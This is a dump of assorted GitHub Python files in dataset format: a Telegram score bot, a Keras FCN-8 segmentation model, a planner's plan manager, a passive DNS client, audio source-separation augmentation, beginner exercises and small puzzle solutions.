\n","repo_name":"ixxra/introduction-to-programming","sub_path":"src/ej-inversion.py","file_name":"ej-inversion.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27649680872","text":"import random\nfrom datetime import datetime, timedelta\n\nfrom pytz import timezone\nfrom aiogram import types\nfrom dispatcher import dp, bot\nfrom bot import db_bot\nfrom config import TIMEZONE\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(message: types.Message):\n chat = message.chat\n if chat.type in [types.ChatType.GROUP, types.ChatType.SUPERGROUP]:\n if not await db_bot.check_chat_id(chat.id):\n message = (\n \"Thanks for adding me to the group!\\n\"\n \"I'm a bot that randomly adds (or subtracts) the score every day.\")\n await bot.send_message(chat.id, message)\n await db_bot.insert_chat_id(chat.id)\n else:\n me = await bot.me\n await message.answer(f'Add me to the group and write a command /start@{me.username}')\n\n\n@dp.message_handler(commands=['score'])\nasync def cmd_score(message: types.Message):\n chat_id = message.chat.id\n user_id = message.from_user.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n mention = f'{message.from_user.full_name}'\n user = list(await db_bot.get_user_info(chat_id, user_id))\n tz = timezone(TIMEZONE)\n date = (datetime.now(tz) + timedelta(hours=3)).date()\n message_text = \"\"\n\n if user and user[1] == date:\n message_text += f'{mention}, you played today!\\n'\n else:\n new_points = random.randint(-5, 10)\n if user:\n user[0] += new_points\n user[1] = date\n await db_bot.update_user_info(chat_id, user_id, *user)\n else:\n user = [new_points, date]\n await db_bot.insert_user_info(chat_id, user_id, *user)\n\n if new_points >= 0:\n message_text += f'{mention}, you get {new_points} score!\\n'\n elif new_points < 0:\n message_text += f'{mention}, you loose {-new_points} score!\\n'\n\n message_text += f\"You have {user[0]} score.\"\n await message.answer(message_text)\n\n\nasync def top(chat_id, anti=False):\n top_users = await db_bot.get_sort_user_info(chat_id, anti)\n message_text = f'top 10 players{\" from end\" if anti else \"\"}:\\n'\n for i, (user_id, points) in enumerate(top_users):\n user = await bot.get_chat_member(chat_id, user_id)\n message_text += f'{i + 1}. {user.user.full_name[:10]}{points} points\\n'\n return message_text\n\n\n@dp.message_handler(commands=['top'])\nasync def cmd_top(message: types.Message):\n chat_id = message.chat.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n await message.answer(await top(chat_id, anti=False))\n\n\n@dp.message_handler(commands=['antitop'])\nasync def cmd_antitop(message: types.Message):\n chat_id = message.chat.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n await message.answer(await top(chat_id, anti=True))\n\n\n@dp.message_handler(commands=['help'])\nasync def cmd_help(message: types.Message):\n message_text = (\n 'Commands:\\n'\n '/score - Add randomly to score from -5 to 10. 
Can be used once a day.\\n'\n '/top - Show top 10 players.\\n'\n '/help - Commands.'\n )\n await message.answer(message_text)","repo_name":"dugd/randomscorebot","sub_path":"handlers/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28446907990","text":"\n\n\n\n\n\n#%%\nnormalized=False\ny_plus=15\ntarget=['pr0.71_flux']\nvar=['u_vel',\"pr0.71\"]\n\n\ndef slice_loc(y_plus,var,target,normalized):\n \"\"\"where to save the slices\n\n Args:\n y_plus (int): y_plus value of slice\n var (list): list of variables\n target (list): list of targets\n normalized (bool): if the data is normalized or not\n\n Returns:\n str: string of file save location\n \"\"\"\n import os\n\n var_sort=sorted(var)\n var_string=\"_\".join(var_sort)\n target_sort=sorted(target)\n target_string=\"_\".join(target_sort)\n\n if normalized==True:\n slice_loc=os.path.join(\"/home/au643300/DataHandling/data/processed\",'y_plus_'+str(y_plus)+\"_VARS-\"+var_string+\"_TARGETS-\"+target_string+\"_normalized\")\n else:\n slice_loc=os.path.join(\"/home/au643300/DataHandling/data/processed\",'y_plus_'+str(y_plus)+\"-VARS-\"+var_string+\"-TARGETS-\"+target_string)\n\n return slice_loc\n\nslice_loc(y_plus,var,target,normalized)\n\n\n\n# %%\n","repo_name":"dragethor/DataHandling","sub_path":"notebooks/Refractored/26-11-21_new_folder_struct.py","file_name":"26-11-21_new_folder_struct.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4985352138","text":"from keras.models import Model\nfrom keras.layers import Conv2D, MaxPooling2D, Conv2DTranspose, Cropping2D, Activation, Add, Input\n\n\nclass FCN8(Model):\n def __init__(self, n_classes):\n super(FCN8, self).__init__(name='FCN-8')\n\n # Encoder\n self.conv1a = Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv1b = Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool1 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv2a = Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv2b = Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool2 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv3a = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv3b = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv3c = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool3 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv4a = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv4b = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv4c = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool4 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv5a = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv5b = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv5c = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool5 = MaxPooling2D(pool_size=(2, 2), 
strides=2)\n\n self.extra1 = Conv2D(filters=4096, kernel_size=(7, 7), activation=\"relu\", padding=\"same\", name=\"conv6\")\n self.extra2 = Conv2D(filters=4096, kernel_size=(1, 1), activation=\"relu\", padding=\"same\", name=\"conv7\")\n\n # Decoder\n # path 1.1\n self.convT1 = Conv2DTranspose(filters=n_classes, kernel_size=(4, 4), strides=2, use_bias=False)\n self.cropT1 = Cropping2D(cropping=(1, 1))\n\n # path 1.2\n self.conv1d1 = Conv2D(filters=n_classes, kernel_size=(1, 1), padding='same', activation='relu')\n\n # ADD-1\n self.add1 = Add()\n\n # path 2.1\n self.convT2 = Conv2DTranspose(filters=n_classes, kernel_size=(4, 4), strides=2, use_bias=False)\n self.cropT2 = Cropping2D(cropping=(1, 1))\n\n # path 2.2\n self.conv1d2 = Conv2D(filters=n_classes, kernel_size=(1, 1), padding='same', activation='relu')\n\n # ADD-2\n self.add2 = Add()\n\n # output\n self.convT3 = Conv2DTranspose(filters=n_classes, kernel_size=(8, 8), strides=8, use_bias=False)\n self.softmax = Activation(\"softmax\")\n\n self.output_layer = Conv2D(filters=3, kernel_size=1, strides=1, activation='sigmoid', padding='same', name=\"OutputLayer\")\n\n def call(self, inputs):\n # Encoder #\n # Block 1\n x = self.conv1a(inputs)\n x = self.conv1b(x)\n x = self.max_pool1(x)\n\n # Block 2\n x = self.conv2a(x)\n x = self.conv2b(x)\n x = self.max_pool2(x)\n\n # Block 3\n x = self.conv3a(x)\n x = self.conv3b(x)\n x = self.conv3c(x)\n x = self.max_pool3(x)\n pool3 = x\n\n # Block 4\n x = self.conv4a(x)\n x = self.conv4b(x)\n x = self.conv4c(x)\n x = self.max_pool4(x)\n pool4 = x\n\n # Block 5\n x = self.conv5a(x)\n x = self.conv5b(x)\n x = self.conv5c(x)\n x = self.max_pool5(x)\n\n x = self.extra1(x)\n x = self.extra2(x)\n\n pool5 = x\n\n # Decoder #\n # Path 1.1\n path11 = self.convT1(pool5)\n path11 = self.cropT1(path11)\n\n # Path 1.2\n path12 = self.conv1d1(pool4)\n\n # Path 2.1 = path1.1 + path1.2\n path21 = self.add1([path11, path12])\n path21 = self.convT2(path21)\n path21 = self.cropT2(path21)\n\n # path 2.2\n path22 = self.conv1d2(pool3)\n\n # Add\n add = self.add2([path21, path22])\n\n # output\n output = self.convT3(add)\n output = self.output_layer(output)\n\n return output\n","repo_name":"hossamasaad/Semantic-Segmantation","sub_path":"models/FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19495693578","text":"import itertools\nimport os\nimport os.path\nimport re\n\nfrom . import returncodes\n\n\n_PLAN_INFO_REGEX = re.compile(r\"; cost = (\\d+) \\((unit cost|general cost)\\)\\n\")\n\n\ndef _read_last_line(filename):\n line = None\n with open(filename) as input_file:\n for line in input_file:\n pass\n return line\n\n\ndef _parse_plan(plan_filename):\n \"\"\"Parse a plan file and return a pair (cost, problem_type)\n summarizing the salient information. 
Return (None, None) for\n incomplete plans.\"\"\"\n\n last_line = _read_last_line(plan_filename) or \"\"\n match = _PLAN_INFO_REGEX.match(last_line)\n if match:\n return int(match.group(1)), match.group(2)\n else:\n return None, None\n\n\nclass PlanManager:\n def __init__(self, plan_prefix, portfolio_bound=None, single_plan=False):\n self._plan_prefix = plan_prefix\n self._plan_costs = []\n self._problem_type = None\n if portfolio_bound is None:\n portfolio_bound = \"infinity\"\n self._portfolio_bound = portfolio_bound\n self._single_plan = single_plan\n\n def get_plan_prefix(self):\n return self._plan_prefix\n\n def get_plan_counter(self):\n return len(self._plan_costs)\n\n def get_next_portfolio_cost_bound(self):\n \"\"\"Return the next plan cost bound to be used in a portfolio planner.\n\n Initially, this is the user-specified cost bound, or \"infinity\"\n if the user specified no bound. Once a plan has been found, it\n is the cost of the best plan found so far. (This is always the\n last plan found because plans must decrease in cost.)\n \"\"\"\n if self._plan_costs:\n return self._plan_costs[-1]\n else:\n return self._portfolio_bound\n\n def abort_portfolio_after_first_plan(self):\n return self._single_plan\n\n def get_problem_type(self):\n if self._problem_type is None:\n returncodes.exit_with_driver_critical_error(\"no plans found yet: cost type not set\")\n return self._problem_type\n\n def process_new_plans(self):\n \"\"\"Update information about plans after a planner run.\n\n Read newly generated plans and store the relevant information.\n If the last plan file is incomplete, delete it.\n \"\"\"\n\n had_incomplete_plan = False\n for counter in itertools.count(self.get_plan_counter() + 1):\n plan_filename = self._get_plan_file(counter)\n def bogus_plan(msg):\n returncodes.exit_with_driver_critical_error(\"%s: %s\" % (plan_filename, msg))\n if not os.path.exists(plan_filename):\n break\n if had_incomplete_plan:\n bogus_plan(\"plan found after incomplete plan\")\n cost, problem_type = _parse_plan(plan_filename)\n if cost is None:\n had_incomplete_plan = True\n print(\"%s is incomplete. 
Deleted the file.\" % plan_filename)\n os.remove(plan_filename)\n else:\n print(\"plan manager: found new plan with cost %d\" % cost)\n if self._problem_type is None:\n # This is the first plan we found.\n self._problem_type = problem_type\n else:\n # Check if info from this plan matches previous info.\n if self._problem_type != problem_type:\n bogus_plan(\"problem type has changed\")\n if cost >= self._plan_costs[-1]:\n bogus_plan(\"plan quality has not improved\")\n self._plan_costs.append(cost)\n\n def get_existing_plans(self):\n \"\"\"Yield all plans that match the given plan prefix.\"\"\"\n if os.path.exists(self._plan_prefix):\n yield self._plan_prefix\n\n for counter in itertools.count(start=1):\n plan_filename = self._get_plan_file(counter)\n if os.path.exists(plan_filename):\n yield plan_filename\n else:\n break\n\n def delete_existing_plans(self):\n \"\"\"Delete all plans that match the given plan prefix.\"\"\"\n for plan in self.get_existing_plans():\n os.remove(plan)\n\n def _get_plan_file(self, number):\n return \"%s.%d\" % (self._plan_prefix, number)\n","repo_name":"aibasel/downward","sub_path":"driver/plan_manager.py","file_name":"plan_manager.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"77"} +{"seq_id":"16912169232","text":"#!/bin/python\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport requests\ntry:\n import requests_cache\n HAS_CACHE = True\nexcept ImportError:\n HAS_CACHE = False\nimport logging\nlogger = logging\n\nsort_choice = ['count', 'rdata', 'rrname', 'rrtype', 'time_first', 'time_last']\n\n\nclass PyPDNS(object):\n\n def __init__(self, url='https://www.circl.lu/pdns/query', basic_auth=None,\n auth_token=None, enable_cache=False, cache_expire_after=604800, cache_file='/tmp/pdns.cache'):\n self.url = url\n if enable_cache and not HAS_CACHE:\n raise Exception('Please install requests_cache if you want to use the caching capabilities.')\n self.enable_cache = enable_cache\n\n if enable_cache is True:\n requests_cache.install_cache(cache_file, backend='sqlite', expire_after=cache_expire_after)\n self.session = requests_cache.CachedSession()\n else:\n self.session = requests.Session()\n if basic_auth is not None:\n # basic_auth has do be a tuple ('user_name', 'password')\n self.session.auth = basic_auth\n elif auth_token is not None:\n self.session.headers.update({'Authorization': auth_token})\n else:\n # No authentication defined.\n pass\n\n def query(self, q, sort_by='time_last'):\n logger.info(\"start query() q=[%s]\", q)\n if sort_by not in sort_choice:\n raise Exception('You can only sort by ' + ', '.join(sort_choice))\n response = self.session.get('{}/{}' .format(self.url, q))\n if response.status_code != 200:\n raise Exception('HTTP error authentication incorrect?')\n to_return = []\n for l in response.text.split('\\n'):\n if len(l) == 0:\n continue\n try:\n if self.enable_cache is True and response.from_cache is True:\n logger.info(\"from cache query() q=[%s]\", q)\n obj = json.loads(l)\n except:\n logger.exception(\"except query() q=[%s]\", q)\n raise Exception('Unable to decode JSON object: ' + l)\n obj['time_first'] = datetime.datetime.fromtimestamp(obj['time_first'])\n obj['time_last'] = datetime.datetime.fromtimestamp(obj['time_last'])\n to_return.append(obj)\n to_return = sorted(to_return, key=lambda k: k[sort_by])\n return 
to_return\n","repo_name":"amir17688/google_data_p1","sub_path":"32920_api.py_C__Users_user_Desktop_data_2_data_google_data_CIRCL_PyPDNS_pypdns.py","file_name":"32920_api.py_C__Users_user_Desktop_data_2_data_google_data_CIRCL_PyPDNS_pypdns.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73577870327","text":"# import the module and init pygame\nimport pygame\npygame.init()\n\nscreen = pygame.display.set_mode([500, 500])\nrunning = True\n\n\"\"\"\nThe Camera variables are used to keep track of where the user currently\nis in space.\n\"\"\"\nglobal camera_x; camera_x = 0\nglobal camera_y; camera_y = 0\nglobal camera_z; camera_z = 0\nglobal camera_vertical_angle; camera_vertical_angle = 90\nglobal camera_horizontal_angle; camera_horizontal_angle = 90\n\nif __name__ == \"__main__\":\n\twhile running:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trunning = False\n\n\t\tscreen.fill((255, 255, 255))\n\t\t\n\t\t\"\"\"\tDO DRAWING AND RENDERING HERE\t\"\"\"\n\n\t\tpygame.display.flip()\n\n\t\n\tpygame.quit()\n","repo_name":"jweir136/PyGame-Tutorial-1","sub_path":"PyGame-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6632396028","text":"#!/usr/bin/env python\n\nfrom sys import argv\nfrom statistics import median, mean\nfrom math import floor\n\ndef my_initial_2nd_part(lst):\n med = median(lst)\n mem = -1\n xx = 0\n for x in range(1000):\n z = 0\n y = 0\n for elem in lst:\n tmp1 = abs(elem - med - x)\n tmp2 = abs(elem - med + x)\n z += tmp1 * (tmp1 + 1) / 2\n y += tmp2 * (tmp2 + 1) / 2\n if mem == -1 or min(mem, z) == z:\n mem = z\n xx = med + x\n if min(mem, y) == y:\n mem = y\n xx = med - x\n print(int(mem), end = ' ')\n print(int(xx))\n\n\nlst = [*map(int, open(argv[1]).readline().split(','))]\nx = median(lst)\nx1 = floor(mean(lst))\nx2 = x1 + 1\nz = z1 = z2 = 0\nfor elem in lst:\n z += abs(elem - x)\n z1 += abs(x1 - elem) * (abs(x1 - elem) + 1) // 2\n z2 += abs(x2 - elem) * (abs(x2 - elem) + 1) // 2\nprint(int(z))\nprint(int(min(z1, z2)))","repo_name":"AugustinLopez/42AI_Piscine_Python","sub_path":"AOC2021/d07/d07.py","file_name":"d07.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11806188772","text":"# coding=utf-8\nimport sys\n\ndef calculate(first_number, second_number, es_una_suma):\n result = 0\n if(es_una_suma == \"suma\"):\n result = int(first_number) + int(second_number)\n else:\n result = int(first_number) - int(second_number)\n return result\n\ndef sum_and_multiplicate_or_not(first_number, second_number, es_una_multiplicacion):\n result = calculate(first_number, second_number, \"suma\")\n if(es_una_multiplicacion == \"multiplicacion\"):\n if(result > 300):\n result = result*2\n else:\n result = result/2\n print(\"Mi resultado final es \" + str(result))\n else:\n print(\"No hago nada a pedido tuyo\")\n\nsum_and_multiplicate_or_not(sys.argv[1], sys.argv[2], sys.argv[3])\n\n''' Empieza a ponerse picante la cosa. Nuevas consideraciones: funciones que retornan parámetros, condicionales anidados.\nBasicamente, dividimos nuestras responsabilidades en dos funciones. 
Y así podríamos hacerlo más veces, de ser necesario: una función que sume, una que multiplique,\notra que imprima en pantalla, una más que nos diga el mensaje que queremos imprimir. Las posibilidades son infinitas'''\n","repo_name":"ronibarylko/python_abm","sub_path":"src/BabySteps/4_conditionalEvolution.py","file_name":"4_conditionalEvolution.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9709530068","text":"# %%\nimport sys\nsys.path.append(\n '/home/houbowei/Artificial_intellectual_disabilities/image_caption')\nsys.path.append('~/cocoapi/PythonAPI')\nfrom model import EncoderCNN, DecoderRNN\n\nimport os\nimport torch\nfrom data_loader import get_loader\nfrom torchvision import transforms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ntransform_test = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n# %%\ndata_loader = get_loader(transform_test, mode='test',\n vocab_file='/home/houbowei/Artificial_intellectual_disabilities/image_caption/vocab.pkl')\norig_image, image = next(iter(data_loader))\nplt.imshow(np.squeeze(orig_image))\nplt.title('example image')\nplt.show()\n\n# %%\ndevice = torch.device('cuda:2' if torch.cuda.is_available() else 'cpu')\n\nencoder_file = './models/256-512-512-encoder-1.pkl'\ndecoder_file = './models/256-512-512-decoder-1.pkl'\n\nembed_size = 512\nhidden_size = 512\n\nvocab_size = len(data_loader.dataset.vocab)\n\nencoder = EncoderCNN(embed_size)\ndecoder = DecoderRNN(embed_size, hidden_size, vocab_size)\n\nencoder.eval()\ndecoder.eval()\n\nencoder.load_state_dict(torch.load(encoder_file))\ndecoder.load_state_dict(torch.load(decoder_file))\n\nencoder.to(device)\ndecoder.to(device)\n\n# Move image Pytorch Tensor to GPU if CUDA is available.\nimage = image.to(device)\n\n# Obtain the embedded image features.\nfeatures = encoder(image).unsqueeze(1)\n\n# Pass the embedded image features through the model to get a predicted caption.\noutput = decoder.sample(features)\nprint('example output:', output)\n\nassert (type(output) == list), \"Output needs to be a Python list\"\nassert all([type(x) == int for x in output]\n ), \"Output should be a list of integers.\"\nassert all([x in data_loader.dataset.vocab.idx2word for x in output]\n ), \"Each entry in the output needs to correspond to an integer that indicates a token in the vocabulary.\"\n","repo_name":"Bovey0809/Artificial_intellectual_disabilities","sub_path":"image_caption/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40958001148","text":"# Python object-Oriented Programming\n\n# Classes\n # Utilizadas para criar Objetos (instances)\n # Objetos são partes de dentro de uma Class (instancias)\n # Classes são utilizadas para agrupar dados e funções, podendo reutilizar\n # ====\n # Class: Frutas\n # Objects: Abacate, Banana...\n\nclass Funcionarios:\n nome = \"Seya\"\n constelacao = \"Pegasus\"\n data_nascimento = \"12/02/1990\"\n\nFuncionarios()\n\nusuario1 = 
Funcionarios()\nprint(usuario1.nome)\nprint(usuario1.constelacao)\nprint(usuario1.data_nascimento)","repo_name":"vinicioschiavo/Python-do-zero-ao-desenvolvimento","sub_path":"basico-de-python/78-criando-a-primeira-classe.py","file_name":"78-criando-a-primeira-classe.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30216680576","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ssp', '0003_proyecto'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='proyecto',\n name='aprovado',\n field=models.CharField(default=b'en proceso', max_length=44, choices=[(b'aprovado', b'aprovado'), (b'rechasado', b'rechasado'), (b'en proceso', b'en proceso')]),\n ),\n ]\n","repo_name":"jasielcalzada/Proyectos_ADAS","sub_path":"apps/ssp/migrations/0004_auto_20161125_2117.py","file_name":"0004_auto_20161125_2117.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27798066608","text":"class Solution:\n def canJump(self, nums: List[int]) -> bool:\n \n n = len(nums)\n \n max_idx = 0\n for i in range(n):\n if i > max_idx:\n return False\n max_idx = max(max_idx, i+nums[i])\n \n return True\n ","repo_name":"berthahsu-0217/leetcode-solutions","sub_path":"0055-jump-game/0055-jump-game.py","file_name":"0055-jump-game.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27683940598","text":"#%%\nimport os \nimport glob \nimport subprocess\nfrom pathlib import Path\n\nfrom pydub import AudioSegment\nimport tqdm\nimport shutil\n\ntarget_sr = 44100\n\n\ndef readSpath(txtpath):\n songpath_list = []\n with open(txtpath, 'r') as file:\n for line in file.readlines():\n songpath_list.append(line.strip('\\n'))\n return songpath_list\n\ndef mergingstems(stems4merge, NoDrum_spath):\n NoDrum_audio = AudioSegment.from_file(stems4merge[0]).set_frame_rate(target_sr).set_channels(1)\n for eachstem in stems4merge[1:]:\n new_stem = AudioSegment.from_file(eachstem).set_frame_rate(target_sr).set_channels(1)\n NoDrum_audio = NoDrum_audio.overlay(new_stem)\n NoDrum_audio.export(NoDrum_spath, format = 'wav')\n\ndef get_datasetSongs_NmergeNsave(datasetName , \n SourceSepAUG_dataset_dir ):\n songdir_list = glob.glob(os.path.join(SourceSepAUG_dataset_dir, datasetName, 'SpleeterSep_temp', \"*\"))\n for eachsong_path in tqdm.tqdm(songdir_list):\n# break\n #### glob all stems\n spleeter_wavs = glob.glob(os.path.join(eachsong_path, \"*.wav\"))\n #### separate pathlist for drum and nodrum\n drumstem_src = os.path.join(eachsong_path, \"drums.wav\")\n stems4merge = list(set(spleeter_wavs)-set([drumstem_src]))\n NoDrum_spath = eachsong_path.replace('SpleeterSep_temp', 'NoDrum')+\".wav\"\n if not os.path.exists(NoDrum_spath):\n mergingstems(stems4merge, NoDrum_spath)\n \n drumwav_spath = eachsong_path.replace('SpleeterSep_temp', 'OnlyDrum')+\".wav\"\n if not os.path.exists(drumwav_spath):\n drumaudio = AudioSegment.from_file(drumstem_src).set_frame_rate(target_sr).set_channels(1)\n drumaudio.export(drumwav_spath, format = 'wav')\n\ndef getAugpath(ori_songtxt, datasetname, augtype = 'NoDrum'):\n songlist = []\n with open(ori_songtxt, 'r') as file:\n for line in file.readlines():\n # break\n 
songlist.append(line.replace('/datasets/original', '/datasets/sourcesep_aug').replace(datasetname+'/audio', datasetname+'/'+augtype))\n return songlist\n\ndef savetxt(spath, songlist):\n with open(spath, 'w') as file:\n for song in songlist:\n file.write(song)\n \n \ndef main():\n \"\"\" \n glob all datasets in original, create audiofile.txt and perform source separation on all songs\n \"\"\"\n ori_dir = os.path.join('./', 'datasets/original/')\n ori_datasets = glob.glob(os.path.join( ori_dir, \"*\"))\n ssaug_dir = os.path.join('./', 'datasets/sourcesep_aug/')\n fail_list = []\n\n ### applying source separation on eachsong in each dataset\n for eachdataset in ori_datasets:\n audio_file_path = os.path.join(eachdataset, \"audio_files.txt\")\n ##### get all songs for the dataset #####\n song_path_list = readSpath(audio_file_path)\n\n ##### applying spleeter on each song #####\n for eachsong in song_path_list:\n out_dirname = os.path.join(ssaug_dir, os.path.basename(eachdataset),\n \"SpleeterSep_temp\")\n if not os.path.exists(out_dirname) :\n print(\"create folder:\", out_dirname)\n Path(out_dirname).mkdir(parents = True, exist_ok = True)\n print(\"Processing dataset:{}, song:{} \".format( eachdataset, Path(eachsong).stem))\n try:\n p = subprocess.Popen([\"spleeter\", \"separate\", \"-i\", str(eachsong), \"-p\", \"spleeter:4stems\", \"-o\", out_dirname ])\n p.communicate()\n except:\n fail_list.append([eachdataset, eachsong])\n \n errors_n = len(fail_list)\n print(\"======> finished processing with {} error songs========\".format(errors_n))\n if errors_n > 0:\n print(\"failed songs:\", fail_list)\n\n ### merging/organizing nondrum/drum stems for each dataset\n print(\"========> Merging Spleeter Stems ========\")\n SourceSepAUG_dataset_list = os.listdir(ssaug_dir)\n\n for eachdataset in SourceSepAUG_dataset_list:\n NoDrum_dir = os.path.join(ssaug_dir, eachdataset, \"NoDrum\")\n if not os.path.exists(NoDrum_dir):\n Path(NoDrum_dir).mkdir(parents = True, exist_ok= True)\n OnlyDrum_dir = os.path.join(ssaug_dir, eachdataset, \"OnlyDrum\")\n if not os.path.exists(OnlyDrum_dir):\n Path(OnlyDrum_dir).mkdir(parents = True, exist_ok = True)\n print(\"======= Processing {} Dataset =======\".format(eachdataset))\n get_datasetSongs_NmergeNsave(eachdataset , \n SourceSepAUG_dataset_dir = ssaug_dir)\n \n #### copy train-test-valid files to nodrum/drum folder\n #### copy downbeat annotation folders to aug folders\n downbeat_src = os.path.join(ori_dir, eachdataset, 'downbeats')\n print(\"=======> copying traintest split to aug folders...\")\n oritxts = [os.path.join(ori_dir, eachdataset , i) for i in ['audio_files.txt', 'train_audiofiles.txt', \n 'test_audiofiles.txt', 'valid_audiofiles.txt']]\n for oritxt in oritxts:\n # break\n for augtype in [\"NoDrum\", \"OnlyDrum\"]:\n # break\n augsonglist = getAugpath(oritxt, eachdataset, augtype)\n augspath = os.path.join(ssaug_dir, eachdataset, augtype, os.path.basename(oritxt))\n if not os.path.exists(augspath):\n savetxt(augspath, augsonglist)\n \n downbeat_dst = os.path.join(ssaug_dir, eachdataset, augtype, 'downbeats')\n if not os.path.exists(downbeat_dst):\n print(\"----> copying annotations to: \", downbeat_dst)\n shutil.copytree(downbeat_src, downbeat_dst)\n\nif __name__ ==\"__main__\":\n main()","repo_name":"SunnyCYC/aug4beat","sub_path":"source_seperation_aug4beat.py","file_name":"source_seperation_aug4beat.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} 
+{"seq_id":"3179579278","text":"import nextcord\nasync def remove(self, Inter, index: int):\n \"\"\" Removes an item from the player's queue with the given index. \"\"\"\n player = self.bot.lavalink.player_manager.get(Inter.guild.id)\n emed = nextcord.Embed(color=0xff470b)\n embed = nextcord.Embed(colour=0xff470b)\n if player is None:\n embed.title =f'ให้ฉันเข้าก่อนสิ'\n await Inter.send(embed=embed)\n return\n \n if not player.is_playing:\n emed.title = 'เฮ้นายน่ะยังไม่ได้เปิดเพลงเลยนะ'\n return await Inter.send(embed=emed)\n if await self.vote_(Inter):\n embed.title =f'ไม่เอิ้กๆ'\n await embed.send(embed=embed)\n return\n\n if index > len(player.queue) or index < 1:\n emed.title = f'> **กรุณเลือกเพลงระหว่าง **between** 1 - {len(player.queue)}**'\n return await Inter.send(embed=emed)\n\n removed = player.queue.pop(index - 1) # Account for 0-index.\n emed.title =f'> 🗑️ เพลง **{removed.title}** ได้ทำการถูกลบแล้ว'\n await Inter.send(embed=emed)","repo_name":"Ax-47/musik","sub_path":"src/commands/music_command/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29366724019","text":"#Descomponer un número\nnumero=int(input('ingrese un numero: '))\n\nM = numero//1000\nnumero = numero-M*1000\nC = numero//100\nnumero =numero-C*100\nD = numero//10\nU = numero-D*10\n\na = str(M)+'M + '\nb = str(C)+'C + '\nc = str(D)+'D + '\nd = str(U)+'U'\nif M == 0:\n\ta = ''\n\n\nfinal = a+b+c+d\nprint(final)\n 